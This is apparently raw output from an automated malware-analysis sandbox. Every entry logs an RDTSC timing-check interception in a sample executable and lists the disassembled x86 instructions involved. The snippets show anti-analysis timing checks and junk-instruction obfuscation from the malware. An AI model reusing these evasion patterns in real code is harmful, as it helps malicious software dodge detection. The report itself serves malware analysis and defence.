                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD9466 second address: AD946C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD946C second address: AD9499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F5D20D3D688h 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jne 00007F5D20D3D6B3h 0x00000015 jmp 00007F5D20D3D693h 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AD9CE2 second address: AD9CEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5D20C2475Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE958 second address: ADE970 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D692h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB0B3F second address: A9056F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5D20C24762h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F5D20C24766h 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F5D20C24758h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Bh 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c lea eax, dword ptr [ebp+1248C827h] 0x00000032 add ecx, 11CC1C0Ah 0x00000038 nop 0x00000039 jmp 00007F5D20C24768h 0x0000003e push eax 0x0000003f jl 00007F5D20C24762h 0x00000045 jg 00007F5D20C2475Ch 0x0000004b nop 0x0000004c mov edi, ebx 0x0000004e call dword ptr [ebp+122D29FEh] 0x00000054 push eax 0x00000055 push edx 0x00000056 push edi 0x00000057 push eax 0x00000058 pop eax 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB0C96 second address: AB0C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB1056 second address: AB105A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB105A second address: 8F7ABC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5D20D3D688h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 adc dx, 1F0Dh 0x00000027 push dword ptr [ebp+122D0861h] 0x0000002d add edi, 50C5AAB9h 0x00000033 call dword ptr [ebp+122D29AAh] 0x00000039 pushad 0x0000003a jmp 00007F5D20D3D690h 0x0000003f xor eax, eax 0x00000041 jo 00007F5D20D3D68Ch 0x00000047 add dword ptr [ebp+122D1943h], ebx 0x0000004d mov edx, dword ptr [esp+28h] 0x00000051 add dword ptr [ebp+122D18ABh], eax 0x00000057 mov dword ptr [ebp+122D2DD5h], eax 0x0000005d jnp 00007F5D20D3D696h 0x00000063 mov esi, 0000003Ch 0x00000068 cld 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d cmc 0x0000006e lodsw 0x00000070 clc 0x00000071 cld 0x00000072 add eax, dword ptr [esp+24h] 0x00000076 mov dword ptr [ebp+122D18ABh], edi 0x0000007c mov ebx, dword ptr [esp+24h] 0x00000080 jmp 00007F5D20D3D698h 0x00000085 nop 0x00000086 push edi 0x00000087 push eax 0x00000088 push edx 0x00000089 pushad 0x0000008a popad 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB110A second address: AB110E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB110E second address: AB1114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB1114 second address: AB1132 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C2475Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jns 00007F5D20C24756h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB1132 second address: 8F7ABC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20D3D688h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F5D20D3D688h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 sub ecx, dword ptr [ebp+122D2D81h] 0x0000002b sbb cl, 0000007Eh 0x0000002e push dword ptr [ebp+122D0861h] 0x00000034 movzx edx, bx 0x00000037 call dword ptr [ebp+122D29AAh] 0x0000003d pushad 0x0000003e jmp 00007F5D20D3D690h 0x00000043 xor eax, eax 0x00000045 jo 00007F5D20D3D68Ch 0x0000004b add dword ptr [ebp+122D1943h], ebx 0x00000051 mov edx, dword ptr [esp+28h] 0x00000055 add dword ptr [ebp+122D18ABh], eax 0x0000005b mov dword ptr [ebp+122D2DD5h], eax 0x00000061 jnp 00007F5D20D3D696h 0x00000067 jng 00007F5D20D3D690h 0x0000006d jmp 00007F5D20D3D68Ah 0x00000072 mov esi, 0000003Ch 0x00000077 cld 0x00000078 add esi, dword ptr [esp+24h] 0x0000007c cmc 0x0000007d lodsw 0x0000007f clc 0x00000080 cld 0x00000081 add eax, dword ptr [esp+24h] 0x00000085 mov dword ptr [ebp+122D18ABh], edi 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jmp 00007F5D20D3D698h 0x00000094 nop 0x00000095 push edi 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB123A second address: AB12A9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5D20C24768h 0x00000008 jmp 00007F5D20C24762h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jng 00007F5D20C2476Eh 0x00000016 jne 00007F5D20C24768h 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 pushad 0x00000021 push edx 0x00000022 jne 00007F5D20C24756h 0x00000028 pop edx 0x00000029 jns 00007F5D20C24758h 0x0000002f popad 0x00000030 mov eax, dword ptr [eax] 0x00000032 push eax 0x00000033 jbe 00007F5D20C2475Ch 0x00000039 jo 00007F5D20C24756h 0x0000003f pop eax 0x00000040 mov dword ptr [esp+04h], eax 0x00000044 pushad 0x00000045 pushad 0x00000046 push edi 0x00000047 pop edi 0x00000048 push esi 0x00000049 pop esi 0x0000004a popad 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB14E6 second address: AB152E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F5D20D3D68Ch 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push ebx 0x00000011 jne 00007F5D20D3D688h 0x00000017 pop ebx 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F5D20D3D697h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jl 00007F5D20D3D688h 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB1AB5 second address: AB1AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AB1FB2 second address: A91111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D68Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jl 00007F5D20D3D68Eh 0x00000010 jnp 00007F5D20D3D688h 0x00000016 nop 0x00000017 or dx, 3BF1h 0x0000001c mov edi, ecx 0x0000001e call dword ptr [ebp+122D3206h] 0x00000024 jmp 00007F5D20D3D692h 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push ebx 0x0000002d pop ebx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 ja 00007F5D20D3D686h 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A91111 second address: A91116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A91116 second address: A91120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDA22 second address: ADDA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnp 00007F5D20C24756h 0x0000000e jmp 00007F5D20C2475Fh 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push esi 0x0000001a jmp 00007F5D20C24761h 0x0000001f jc 00007F5D20C24756h 0x00000025 pop esi 0x00000026 jmp 00007F5D20C2475Fh 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDA6D second address: ADDA72 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDA72 second address: ADDAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20C24764h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5D20C24765h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDD22 second address: ADDD30 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F5D20D3D686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDD30 second address: ADDD5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 ja 00007F5D20C24756h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F5D20C24763h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDD5E second address: ADDD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5D20D3D686h 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDD6D second address: ADDD75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDD75 second address: ADDD79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDD79 second address: ADDD8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F5D20C24762h 0x0000000c jbe 00007F5D20C24756h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDED7 second address: ADDEDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDEDB second address: ADDEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADDEE7 second address: ADDF04 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F5D20D3D696h 0x00000008 pop edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE08E second address: ADE094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE094 second address: ADE09A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE222 second address: ADE22E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20C24756h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: ADE22E second address: ADE242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F5D20D3D68Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3772 second address: AE37C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F5D20C24768h 0x0000000b jmp 00007F5D20C24768h 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5D20C24761h 0x00000018 jmp 00007F5D20C2475Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE37C8 second address: AE37DE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5D20D3D686h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F5D20D3D686h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE37DE second address: AE37E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3BE5 second address: AE3C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F5D20D3D699h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F5D20D3D68Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4037 second address: AE4043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007F5D20C24756h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4043 second address: AE4055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jno 00007F5D20D3D686h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE41B3 second address: AE41B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE42F3 second address: AE4301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 js 00007F5D20D3D686h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4301 second address: AE4309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE4712 second address: AE472C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5D20D3D696h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3049 second address: AE3053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5D20C24756h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3053 second address: AE3061 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3061 second address: AE3065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AE3065 second address: AE3069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AEA508 second address: AEA50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AEA50D second address: AEA53D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20D3D693h 0x00000007 jmp 00007F5D20D3D693h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 push edx 0x00000012 pop edx 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AEA53D second address: AEA542 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27A0 second address: AF27A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27A4 second address: AF27C6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5D20C24756h 0x00000008 jmp 00007F5D20C24762h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27C6 second address: AF27CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27CA second address: AF27D8 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27D8 second address: AF27E8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5D20D3D686h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27E8 second address: AF27EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF27EC second address: AF27F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51DD second address: AF51ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5D20C24756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51ED second address: AF51F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51F1 second address: AF51F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF51F7 second address: AF5205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 js 00007F5D20D3D68Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF560B second address: AF5620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5D20C24760h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF7219 second address: AF721F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF721F second address: AF7224 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AF7224 second address: AF7242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pushad 0x00000009 jmp 00007F5D20D3D693h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B00261 second address: B00269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B00269 second address: B0026D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6310A second address: A6311A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F5D20C24756h 0x0000000a jno 00007F5D20C24756h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: A6311A second address: A63120 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AFECF6 second address: AFED08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jo 00007F5D20C2475Ch 0x0000000c jc 00007F5D20C24756h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AFEFA1 second address: AFEFB1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5D20D3D686h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: AFF67A second address: AFF69F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F5D20C2475Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jp 00007F5D20C24756h 0x00000012 pop ecx 0x00000013 push ebx 0x00000014 jnp 00007F5D20C24756h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B0374C second address: B03750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B038AF second address: B038B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03B64 second address: B03B68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\wf1Ps82LYF.exeRDTSC instruction interceptor: First address: B03B68 second address: B03B8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5D20C24762h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jnc 00007F5D20C24756h 0x00000017 popad 0x00000018 rdtsc
